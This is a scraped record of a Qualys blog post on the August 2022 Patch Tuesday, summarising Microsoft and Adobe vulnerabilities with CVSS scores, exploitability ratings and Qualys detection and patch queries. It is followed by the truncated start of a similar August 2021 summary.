Code Execution (RCE), and Security Feature Bypass with severities of Low, Moderate, and Important respectively.\n\nMicrosoft has fixed several flaws in its software, including Denial of Service (DoS), Elevation of Privilege (EoP), Information Disclosure, Microsoft Edge (Chromium-based), Remote Code Execution (RCE), Security Feature Bypass, and Spoofing.\n\n## **The August 2022 Microsoft vulnerabilities are classified as follows:**\n\n\n\n [Related Threat Protection Post](<https://threatprotect.qualys.com/2022/08/10/microsoft-patches-121-vulnerabilities-with-two-zero-days-and-17-critical-plus-20-microsoft-edge-chromium-based-in-august-2022-patch-tuesday/>)\n\n# **Notable Microsoft Vulnerabilities Patched**\n\nA vulnerability is classified as a zero-day if it is publicly disclosed or actively exploited with no official fix available.\n\n### [](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>)[CVE-2022-34713](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34713>) | Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution (RCE) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 7.8/10.\n\nIn May, Microsoft released a [blog](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) giving guidance for a vulnerability in MSDT and released updates to address it shortly thereafter. Public discussion of a vulnerability can encourage further scrutiny on the component, both by Microsoft security personnel as well as their research partners. _This CVE is a variant of the vulnerability publicly known as Dogwalk._\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Detected_**\n\n>  Qualys director of vulnerability and threat research, [Bharat Jogi](<https://blog.qualys.com/author/bharat_jogi>), said DogWalk had actually been reported back in 2019 but at the time was not thought to be dangerous as it required \u201csignificant user interaction to exploit,\u201d and there were other mitigations in place.\n> \n> - _Excerpt from [Surge in CVEs as Microsoft Fixes Exploited Zero Day Bug](<https://www.infosecurity-magazine.com/news/surge-cves-microsoft-fixes/>)_\n\n* * *\n\n### [](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>)[CVE-2022-30134](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30134>) | Microsoft Exchange Information Disclosure Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 7.6/10.\n\nThis vulnerability requires that a user with an affected version of Exchange Server access a malicious server. An attacker would have to host a specially crafted server share or website. An attacker would have no way to force users to visit this specially crafted server share or website, but would have to convince them to visit the server share or website, typically by way of an enticement in an email or chat message. For more information, see [Exchange Server Sup](<https://aka.ms/ExchangeEPDoc>)[port for Windows Extended Protection](<https://microsoft.github.io/CSS-Exchange/Security/Extended-Protection/>) and/or [The Exchange Blog](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-august-2022-exchange-server-security-updates/ba-p/3593862>).\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Unlikely_**\n\n* * *\n\n## **Security Feature Bypass Vulnerabilities Addressed**\n\nThese are **standalone security updates**. These packages must be installed in addition to the normal security updates to be protected from this vulnerability.\n\nThese security updates have a Servicing Stack Update prerequisite for specific KB numbers. The packages have a built-in pre-requisite logic to ensure the ordering.\n\nMicrosoft customers should ensure they have installed the latest Servicing Stack Update before installing these standalone security updates. See [ADV990001 | Latest Servicing Stack Updates](<https://msrc.microsoft.com/update-guide/security-guidance/advisory/ADV990001>) for more information.\n\nAn attacker who successfully exploited either of these three (3) vulnerabilities could bypass Secure Boot.\n\n### CERT/CC: [CVE-2022-34301](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34301>) Eurosoft Boot Loader Bypass\n\n### CERT/CC: [CVE-2022-34302](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34302>) New Horizon Data Systems Inc Boot Loader Bypass\n\n### CERT/CC: [CVE-2022-34303](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34303>) Crypto Pro Boot Loader Bypass\n\nAt the time of publication, a CVSSv3.1 score has not been assigned.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation More Like_**ly\n\n* * *\n\n## **Microsoft Critical and Important Vulnerability Highlights**\n\nThis month\u2019s [advisory](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Aug>) covers multiple Microsoft product families, including Azure, Browser, Developer Tools, [Extended Security Updates (ESU)](<https://docs.microsoft.com/en-us/lifecycle/faq/extended-security-updates>), Exchange Server, Microsoft Office, System Center,, and Windows.\n\nA total of 86 unique Microsoft products/versions are affected, including .NET, Azure, Edge (Chromium-based), Excel, Exchange Server (Cumulative Update), Microsoft 365 Apps for Enterprise, Office, Open Management Infrastructure, Outlook, and System Center Operations Manager (SCOM), Visual Studio, Windows Desktop, and Windows Server.\n\nDownloads include IE Cumulative, Monthly Rollup, Security Only, and Security Updates.\n\n* * *\n\n### [](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>)[CVE-2022-35766](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35766>), [CVE-2022-35794](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35794>) | Windows Secure Socket Tunneling Protocol (SSTP) Remote Code Execution (RCE) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 8.1/10.\n\nSuccessful exploitation of this vulnerability requires an attacker to win a race condition.\n\nAn unauthenticated attacker could send a specially crafted connection request to a RAS server, which could lead to remote code execution (RCE) on the RAS server machine.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n### [](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>)[CVE-2022-30133](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30133>), [CVE-2022-35744](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35744>) | Windows Point-to-Point Protocol (PPP) Remote Code Execution (RCE) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 9.8/10.\n\nThis vulnerability can only be exploited by communicating via Port 1723. As a temporary workaround prior to installing the updates that address this vulnerability, you can block traffic through that port thus rendering the vulnerability unexploitable. **Warning**: Disabling Port 1723 could affect communications over your network.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n### [](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>)[CVE-2022-34691](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34691>) | Active Directory Domain Services Elevation of Privilege (EoP) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 8.8/10.\n\nThis vulnerability can only be exploited by communicating via Port 1723. As a temporary workaround An authenticated user could manipulate attributes on computer accounts they own or manage, and acquire a certificate from Active Directory Certificate Services that would allow elevation of privilege to System.\n\nPlease see [Certificate-based authentication changes on Windows domain controllers](<https://support.microsoft.com/en-us/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16>) for more information and ways to protect your domain.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n### [](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>)[CVE-2022-33646](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-33646>) | Azure Batch Node Agent Elevation of Privilege (EoP) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 7.0/10.\n\nSuccessful exploitation of this vulnerability requires an attacker to prepare the target environment to improve exploit reliability.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation More Likely_**\n\n* * *\n\n## **Microsoft Edge | Last But Not Least**\n\nEarlier in August, Microsoft released Microsoft Edge (Chromium-based) vulnerabilities [CVE-2022-33636](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-33636>), [](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-2294>)[CVE-2022-33649](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-33649>), and [CVE-2022-35796](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35796>). The vulnerability assigned to each of these CVEs is in the Chromium Open Source Software (OSS) which is consumed by Microsoft Edge. It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable. For more information, please see [Security Update Guide Supports CVEs Assigned by Industry Partners](<https://msrc-blog.microsoft.com/2021/01/13/security-update-guide-supports-cves-assigned-by-industry-partners/>).\n\n### [CVE-2022-33649](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-33649>) | Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 9.6/10.\n\nAn attacker could host a specially crafted website designed to exploit the vulnerability through Microsoft Edge and then convince a user to view the website. However, in all cases an attacker would have no way to force a user to view the attacker-controlled content. Instead, an attacker would have to convince a user to take action, typically by an enticement in an email or instant message, or by getting the user to open an attachment sent through email. \n\nThe user would have to click on a specially crafted URL to be compromised by the attacker.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n### [](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-33649>)[CVE-2022-33636](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-33636>), [](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-33636>)[CVE-2022-35796](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35796>) | Microsoft Edge (Chromium-based) Remote Code Execution (RCE) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 8.3/10. _[Per Microsoft&#x27;s severity guidelines](<https://www.microsoft.com/en-us/msrc/bounty-new-edge>), the amount of user interaction or preconditions required to allow this sort of exploitation downgraded the severity. The CVSS scoring system doesn&#x27;t allow for this type of nuance._\n\nAn attacker could host a specially crafted website designed to exploit the vulnerability through Microsoft Edge and then convince a user to view the website. However, in all cases, an attacker would have no way to force a user to view the attacker-controlled content. Instead, an attacker would have to convince a user to take action, typically by an enticement in an email or instant message, or by getting the user to open an attachment sent through email.\n\nSuccessful exploitation of this vulnerability requires an attacker to win a race condition.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n# **Adobe Security Bulletins and Advisories**\n\nAdobe released five (5) [advisories](<https://helpx.adobe.com/security/security-bulletin.html>) with updates to fix 25 vulnerabilities affecting Adobe Acrobat and Reader, Commerce, FrameMaker, Illustrator, and Premiere Elements applications. Of these 25 vulnerabilities, 15 are rated as **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_**; ranging in severity from a CVSS score of 7.8/10 to 9.1/10, as summarized below.\n\n\n\n* * *\n\n### [APSB22-38](<https://helpx.adobe.com/security/products/magento/apsb22-38.html>) | Security update available for Adobe Commerce\n\nThis update resolves seven (7) vulnerabilities:\n\n * Four (4) **_[_**Critical**_](<https://helpx.adobe.com/security/severity-ratings.html>)_**\n * Two (2) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_**\n * One (1) **_[Moderate](<https://helpx.adobe.com/security/severity-ratings.html>)_**\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released a security update for Adobe Commerce and Magento Open Source. This update resolves [critical](<https://helpx.adobe.com/security/severity-ratings.html>), [important](<https://helpx.adobe.com/security/severity-ratings.html>), and [moderate](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities. Successful exploitation could lead to arbitrary code execution, privilege escalation, and security feature bypass.\n\n* * *\n\n### [APSB22-39](<https://helpx.adobe.com/security/products/acrobat/apsb22-39.html>) | Security update available for Adobe Acrobat and Reader\n\nThis update resolves seven (7) vulnerabilities:\n\n * Three (3) [_**Critical**_](<https://helpx.adobe.com/security/severity-ratings.html>)\n * Four (4) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_**\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 2_\n\nAdobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. These updates address multiple [critical](<https://helpx.adobe.com/security/severity-ratings.html>) and [important](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities. Successful exploitation could lead to arbitrary code execution and memory leak.\n\n* * *\n\n### [APSB22-41](<https://helpx.adobe.com/security/products/illustrator/apsb22-41.html>) | Security Updates Available for Adobe Illustrator\n\nThis update resolves four (4) vulnerabilities:\n\n * Two (2) [_**Critical**_](<https://helpx.adobe.com/security/severity-ratings.html>)\n * Two (2) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_**\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released an update for Adobe Illustrator 2022. This update resolves [critical](<https://helpx.adobe.com/security/severity-ratings.html>) and [important](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities that could lead to arbitrary code execution and memory leak.\n\n* * *\n\n### [APSB22-42](<https://helpx.adobe.com/security/products/framemaker/apsb22-42.html>) | Security update available for Adobe FrameMaker\n\nThis update resolves six (6) vulnerabilities:\n\n * Five (5) [_**Critical**_](<https://helpx.adobe.com/security/severity-ratings.html>)\n * One (1) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_**\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released a security update for Adobe FrameMaker. This update addresses multiple [critical](<https://helpx.adobe.com/security/severity-ratings.html>) and [important](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities. Successful exploitation could lead to arbitrary code execution \nand memory leak. \n\n* * *\n\n### [APSB22-43](<https://helpx.adobe.com/security/products/premiere_elements/apsb22-43.html>) | Security update available for Adobe Premiere Elements\n\nThis update resolves one (1) [_**Critical**_](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerability.\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released a security update for Adobe FrameMaker. This update addresses multiple [critical](<https://helpx.adobe.com/security/severity-ratings.html>) and [important](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities. Successful exploitation could lead to arbitrary code execution \nand memory leak. \n\n* * *\n\n# **About Qualys Patch Tuesday**\n\nQualys Patch Tuesday QIDs are published as [Security Alerts](<https://www.qualys.com/research/security-alerts/>) typically late in the evening on the day of [Patch Tuesday](<https://blog.qualys.com/tag/patch-tuesday>), followed later by the publication of the monthly queries for the [Unified Dashboard: 2022 Patch Tuesday (QID Based) Dashboard](<https://success.qualys.com/discussions/s/article/000006821>) by Noon on Wednesday.\n\n## Qualys [Threat Protection](<https://www.qualys.com/apps/threat-protection/>) High-Rated Advisories for August 1-9, 2022 _New Content_\n\n * [Microsoft Patches 121 Vulnerabilities with Two Zero-days and 17 Critical; Plus 20 Microsoft Edge (Chromium-Based) in August 2022 Patch Tuesday](<https://threatprotect.qualys.com/2022/08/10/microsoft-patches-121-vulnerabilities-with-two-zero-days-and-17-critical-plus-20-microsoft-edge-chromium-based-in-august-2022-patch-tuesday/>)\n * [VMware vRealize Operations Multiple Vulnerabilities Patched in the Latest Security update (CVE-2022-31672, CVE-2022-31673, CVE-2022-31674, &amp; CVE-2022-31675)](<https://threatprotect.qualys.com/2022/08/10/vmware-vrealize-operations-multiple-vulnerabilities-patched-in-the-latest-security-update-cve-2022-31672-cve-2022-31673-cve-2022-31674-cve-2022-31675/>)\n * [Cisco Patched Small Business RV Series Routers Multiple Vulnerabilities (CVE-2022-20827, CVE-2022-20841, and CVE-2022-20842)](<https://threatprotect.qualys.com/2022/08/04/cisco-patched-small-business-rv-series-routers-multiple-vulnerabilities-cve-2022-20827-cve-2022-20841-and-cve-2022-20842/>)\n * [VMware Patched Multiple Vulnerabilities in VMware Products including Identity Manager (vIDM) and Workspace ONE Access](<https://threatprotect.qualys.com/2022/08/03/vmware-patched-multiple-vulnerabilities-in-vmware-products-including-identity-manager-vidm-and-workspace-one-access/>)\n * [Atlassian Confluence Server and Confluence Data Center \u2013 Questions for Confluence App \u2013 Hardcoded Password Vulnerability (CVE-2022-26138)](<https://threatprotect.qualys.com/2022/08/01/atlassian-confluence-server-and-confluence-data-center-questions-for-confluence-app-hardcoded-password-vulnerability-cve-2022-26138/>)\n\n* * *\n\n## Discover and Prioritize Vulnerabilities in [Vulnerability Management Detection Response (VMDR)](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) \n\nQualys VMDR automatically detects new Patch Tuesday vulnerabilities using continuous updates to its KnowledgeBase (KB). \n\nYou can see all your impacted hosts by these vulnerabilities using the following QQL query:\n \n \n vulnerabilities.vulnerability:( qid:`50121` OR qid:`91929` OR qid:`91931` OR qid:`91932` OR qid:`91933` OR qid:`91934` OR qid:`91935` OR qid:`91936` OR qid:`110413` OR qid:`110414` OR qid:`376813` ) \n\n\n\n [A Deep Dive into VMDR 2.0 with Qualys TruRisk\u2122](<https://blog.qualys.com/product-tech/2022/08/08/a-deep-dive-into-vmdr-2-0-with-qualys-trurisk>) _The old way of ranking vulnerabilities doesn\u2019t work anymore. Instead, enterprise security teams need to rate the true risks to their business. In this blog, we examine each of the risk scores delivered by Qualys TruRisk, the criteria used to compute them, and how they can be used to prioritize remediation._\n\n* * *\n\n## Rapid Response with [Patch Management (PM)](<https://www.qualys.com/apps/patch-management/>)\n\nVMDR rapidly remediates Windows hosts by deploying the most relevant and applicable per-technology version patches. You can simply select respective QIDs in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go.\n\nThe following QQL will return the missing patches for this Patch Tuesday:\n \n \n ( qid:`50121` OR qid:`91929` OR qid:`91931` OR qid:`91932` OR qid:`91933` OR qid:`91934` OR qid:`91935` OR qid:`91936` OR qid:`110413` OR qid:`110414` OR qid:`376813` ) \n\n\n\n [Risk-based Remediation Powered by Patch Management in Qualys VMDR 2.0](<https://blog.qualys.com/product-tech/2022/06/22/risk-based-remediation-powered-by-patch-management-in-qualys-vmdr-2-0>)\n\n* * *\n\n## Evaluate Vendor-Suggested Workarounds with [Policy Compliance](<https://www.qualys.com/forms/policy-compliance/>) _New Content_\n\nQualys\u2019 [Policy Compliance Control Library](<https://vimeo.com/700790353>) makes it easy to evaluate your technology infrastructure when the current situation requires the implementation of a vendor-suggested workaround. A workaround is a method, sometimes used temporarily, for achieving a task or goal when the usual or planned method isn&#x27;t working. Information technology often uses a workaround to overcome hardware, programming, or communication problems. Once a problem is fixed, a workaround is usually abandoned. _ [Source](<https://www.techtarget.com/whatis/definition/workaround>)_\n\nThe following Qualys [Policy Compliance Control IDs (CIDs), and System Defined Controls (SDC) ](<https://qualysguard.qg2.apps.qualys.com/qwebhelp/fo_portal/module_pc/controls/controls_lp.htm>)have been updated to support Microsoft recommended workaround for this Patch Tuesday:\n\n#### **[CVE-2022-35793](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35793>) | Windows Print Spooler Elevation of Privilege (EoP) Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 7.3/10.\n\nPolicy Compliance Control IDs (CIDs):\n\n * 1368: Status of the \u2018Print Spooler\u2019 service\n * 21711: Status of the \u2018Allow Print Spooler to accept client connections\u2019 group policy setting \n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): Exploitation More Likely\n\n* * *\n\n#### **[CVE-2022-35804](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35804>)** | **SMB Client and Server Remote Code Execution (RCE) Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 8.8/10.\n\nPolicy Compliance Control IDs (CIDs):\n\n * 24476: Status of the SMBv3 Client compressions setting\n * 20233: Status of the SMBv3 Server compressions setting \n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): Exploitation More Likely\n\n* * *\n\n#### ****[CVE-2022-35755](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35755>)** | **Windows Print Spooler Elevation of Privilege (EoP) Vulnerability****\n\nThis vulnerability has a CVSSv3.1 score of 7.3/10.\n\nPolicy Compliance Control IDs (CIDs):\n\n * 1368: Status of the \u2018Print Spooler\u2019 service\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): Exploitation More Likely\n\n* * *\n\n#### **[CVE-2022-30133](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30133>)**, **[CVE-2022-35744](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35744>)** | **Windows Point-to-Point Protocol (PPP) Remote Code Execution (RCE) Vulnerability** \n\nThis vulnerability has a CVSSv3.1 score of 9.8/10.\n\nPolicy Compliance Control IDs (CIDs):\n\n * 11220: List of \u2018Inbound Rules\u2019 configured in Windows Firewall with Advanced Security via GPO\n * 14028: List of \u2018Outbound Rules\u2019 configured in Windows Firewall with Advanced Security via GPO\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): Exploitation Less Likely\n\n* * *\n\n#### **[CVE-2022-34715](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34715>): Windows Network File System Remote Code Execution (RCE) Vulnerability** \n\nThis vulnerability has a CVSSv3.1 score of 9.8/10.\n\nPolicy Compliance Control IDs (CIDs):\n\n * 24139: Status of the Windows Network File System (NFSV4) service\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): Exploitation Less Likely\n\n* * *\n\n#### ****[CVE-2022-34691](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34691>): Active Directory Domain Services Elevation of Privilege (EoP) Vulnerability****\n\nThis vulnerability has a CVSSv3.1 score of 8.8/10.\n\nPolicy Compliance Control IDs (CIDs):\n\n * 4079: Status of the \u2018Active Directory Certificate Service\u2019\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): Exploitation Less Likely\n\n* * *\n\nThe following QQL will return a posture assessment for the CIDs for this Patch Tuesday:\n \n \n control:( id:`1368` OR id:`4079` OR id:`11220` OR id:`14028` OR id:`20233` OR id:`21711` OR id:`24139` OR id:`24476` ) \n\n\n\n [Mitigating the Risk of Zero-Day Vulnerabilities by using Compensating Controls](<https://blog.qualys.com/vulnerabilities-threat-research/2022/08/23/mitigating-the-risk-of-zero-day-vulnerabilities-by-using-compensating-controls>)\n\n [Policy Compliance (PC) | Policy Library Update Blogs](<https://notifications.qualys.com/tag/policy-library>)\n\n* * *\n\n##### Patch Tuesday is Complete.\n\n* * *\n\n# Qualys Monthly Webinar Series \n\n\n\nThe Qualys Research team hosts a monthly webinar series to help our existing customers leverage the seamless integration between Qualys[ Vulnerability Management Detection Response (VMDR)](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) and Qualys [Patch Management](<https://www.qualys.com/apps/patch-management/>). Combining these two solutions can reduce the median time to remediate critical vulnerabilities. \n\nDuring the webcast, we will discuss this month\u2019s high-impact vulnerabilities, including those that are part of this month&#x27;s Patch Tuesday alert. We will walk you through the necessary steps to address the key vulnerabilities using Qualys VMDR and Qualys Patch Management. \n\n* * *\n\n### **Join the webinar**\n\n## **This Month in Vulnerabilities &amp; Patches**\n\n[Register Now](<https://gateway.on24.com/wcc/eh/3347108/category/97049/patch-tuesday>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-08-09T20:00:00", "type": "qualysblog", "title": "August 2022 Patch Tuesday | Microsoft Releases 121 Vulnerabilities with 17 Critical, plus 20 Microsoft Edge (Chromium-Based); Adobe Releases 5 Advisories, 25 Vulnerabilities with 15 Critical.", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20827", "CVE-2022-20841", "CVE-2022-20842", "CVE-2022-22047", "CVE-2022-2294", "CVE-2022-26138", "CVE-2022-30133", "CVE-2022-30134", "CVE-2022-30190", "CVE-2022-31672", "CVE-2022-31673", "CVE-2022-31674", "CVE-2022-31675", "CVE-2022-33636", "CVE-2022-33646", "CVE-2022-33649", "CVE-2022-34301", "CVE-2022-34302", "CVE-2022-34303", "CVE-2022-34691", "CVE-2022-34713", "CVE-2022-34715", "CVE-2022-35744", "CVE-2022-35755", "CVE-2022-35766", "CVE-2022-35793", "CVE-2022-35794", "CVE-2022-35796", "CVE-2022-35804"], "modified": "2022-08-09T20:00:00", "id": "QUALYSBLOG:AC756D2C7DB65BB8BC9FBD558B7F3AD3", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-21T10:10:11", "description": "### Microsoft Patch Tuesday \u2013 August 2021\n\nMicrosoft patched 51 vulnerabilities in their August 2021 Patch Tuesday release, and 7 of them are rated as critical severity. Three 0-day vulnerability patches were included in the release.\n\n#### Critical Microsoft Vulnerabilities Patched\n\n[CVE-2021-36942](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36942>) - Windows LSA Spoofing Vulnerability\n\nAn unauthenticated attacker could call a method on the LSARPC interface and coerce the domain controller to authenticate against another server using NTLM. A malicious user can use this attack to take complete control over windows domain Per Microsoft, this vulnerability affects all servers, but domain controllers should be prioritized in terms of applying security updates.\n\n[CVE-2021-34481](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34481>) \u2013 Windows Print Spooler Remote Code Execution Vulnerability\n\nA remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. This Patch Tuesday Microsoft released security updates to address this vulnerability and should be prioritized.\n\n#### Three 0-Day Vulnerabilities Patched\n\n * [CVE-2021-36936](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36936>) - Windows Print Spooler Remote Code Execution Vulnerability\n * [CVE-2021-36942](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36942>) - Windows LSA Spoofing Vulnerability\n * [CVE-2021-36948](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36948>) - Windows Update Medic Service Elevation of Privilege Vulnerability - This has been actively exploited, per Microsoft.\n\n#### Qualys QIDs Providing Coverage\n\n**QID**| **Title**| **Severity**| **CVE ID** \n---|---|---|--- \n110388| Microsoft SharePoint Enterprise Server Multiple Vulnerabilities August 2021| Medium| [_CVE-2021-36940_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36940>) \n110389| Microsoft Office and Microsoft Office Services and Web Apps Security Update August 2021 | High| [_CVE-2021-34478_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34478>), [_CVE-2021-36941_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36941>) \n375798| Microsoft Azure CycleCloud Elevation of Privilege Vulnerability August 2021 | Medium| [_CVE-2021-33762_](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33762>), [_CVE-2021-36943_](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36943>), [_KB3142345_](<https://www.microsoft.com/en-us/download/details.aspx?id=103313>) \n91801| Microsoft Dynamics Business Central Cross-Site (XSS) Scripting Vulnerability August 2021 | Medium | [_CVE-2021-36946_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36946>) \n91802| Microsoft Windows Security Update for August 2021 \n \n | High| CVE-2021-26424, [_CVE-2021-26425_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26425>), [_CVE-2021-26426_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26426>), [_CVE-2021-26431_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26431>), [_CVE-2021-26432_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26432>), [_CVE-2021-26433_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26433>), [_CVE-2021-34480_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34480>), [_CVE-2021-34483_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34483>), [_CVE-2021-34484_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34484>), [_CVE-2021-34486_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34486>), [_CVE-2021-34487_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34487>), [_CVE-2021-34530_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34530>), [_CVE-2021-34533_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34533>), 